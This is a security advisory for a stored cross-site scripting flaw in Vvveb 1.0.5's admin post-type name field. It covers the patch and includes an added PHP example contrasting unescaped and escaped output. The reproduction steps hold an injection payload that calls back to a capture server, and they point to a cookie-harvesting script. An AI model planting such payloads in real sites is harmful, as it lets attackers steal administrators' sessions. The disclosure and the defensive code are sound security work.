Vvveb 1.0.5 | Authenticated site-wide silent XSS

Basic Information

Software Type Web App
Software Name Vvveb
Affected Version 1.0.5
Software Vendor Vvveb
Software Link https://github.com/givanz/Vvveb
Severity High
CVSS Score 8.8
Affected Assets 100+
Date of Discovery Jan 3rd, 2025

Description

The endpoint at [/vadmin123/index.php?module=settings/post-types] is vulnerable to stored XSS. A post type name saved there is written unescaped into the admin menu, so a payload stored once is rendered on every page reached through [/vadmin123/].
This vulnerability can be exploited by anyone holding the "Site Administrator", "Administrator" or "Super Administrator" role.

A well-crafted XSS payload can be used to harvest cookies from multiple site admins, editors, vendors and everyone else who uses the admin panel.

Reproduce

Log in as a user with the "Site Administrator" role and open the following endpoint:
/vadmin123/index.php?module=settings/post-types

At the top left, click the "Add type" button. This opens the form for adding a post type; in the [name="post_type[type]"] field, enter a payload such as:
"><img src='http://127.0.0.1:1718/capture.php'>

Because the stored name is rendered unescaped in the admin menu, this markup is delivered to every user of the admin panel [/vadmin123/] on every page load, silently and without further interaction. Note that an <img src> element on its own only makes the victim's browser issue a GET to the attacker's server (carrying the Referer header); actually reading document.cookie requires JavaScript in the payload, and cookies flagged HttpOnly remain out of reach of script regardless.

To set up a capture server for the callbacks, save the following PHP script as capture.php:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Start a PHP server to serve it:
$ php -S 0.0.0.0:1718

Proof of Concept (PoC) Video

PoC Exploit

N/A

Mitigation

N/A

Patch

Vvveb added htmlspecialchars() to all menu entry output in menu.tpl, so stored names are escaped before being rendered into the admin menu.
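The following PHP is an added illustration of the rendering bug described above and of the escaping the patch introduces; it is not Vvveb's code, and the function names, the link markup and the `$storedName` sample input (the payload from the Reproduce section) are my own assumptions. It renders a menu entry both the unescaped way and with htmlspecialchars(), and includes a small check that can serve as a regression test.

```php
<?php
// Added example, not Vvveb's own code. Function names and markup are assumed
// for illustration; the only thing taken from the advisory is the payload.

// Constructed input: the payload from the Reproduce section, as it would be
// stored in the post_type[type] field.
$storedName = "\"><img src='http://127.0.0.1:1718/capture.php'>";

// Vulnerable rendering: the stored value is interpolated into HTML as-is.
// The leading double quote and '>' close the attribute and the <a> tag,
// so the <img> that follows becomes live markup in the admin menu.
function renderMenuEntryVulnerable(string $name): string
{
    return "<a href=\"index.php?module=settings/post-types&type=" . $name . "\">"
        . $name . "</a>";
}

// Hardened rendering: escape each stored value for the context it lands in.
// ENT_QUOTES is required so that both ' and " are encoded (the payload relies
// on a double quote to break out of the attribute); ENT_SUBSTITUTE keeps
// invalid UTF-8 from silently producing an empty string; the explicit charset
// avoids depending on PHP's default.
function renderMenuEntrySafe(string $name): string
{
    $text  = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    // The same value inside a query string is a URL context, so it is
    // percent-encoded there in addition to the HTML escaping of the label.
    $query = rawurlencode($name);
    return "<a href=\"index.php?module=settings/post-types&amp;type=" . $query . "\">"
        . $text . "</a>";
}

// Regression check: a rendered menu fragment must never contain an <img>
// (or any other tag) that came from stored data.
function containsInjectedTag(string $html): bool
{
    return stripos($html, '<img') !== false;
}

$vuln = renderMenuEntryVulnerable($storedName);
$safe = renderMenuEntrySafe($storedName);

echo "vulnerable: ", $vuln, PHP_EOL;
echo "hardened:   ", $safe, PHP_EOL;
echo "vulnerable contains injected tag: ", var_export(containsInjectedTag($vuln), true), PHP_EOL;
echo "hardened contains injected tag:   ", var_export(containsInjectedTag($safe), true), PHP_EOL;
```

Output escaping is the fix that closes this issue, but since a post type name is an identifier rather than free text, a practitioner would additionally reject names outside a small allowed character set (for example letters, digits, underscore and hyphen) when the form is saved, so that a hostile value never reaches the database in the first place.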



Posted on: January 10, 2025 11:28 PM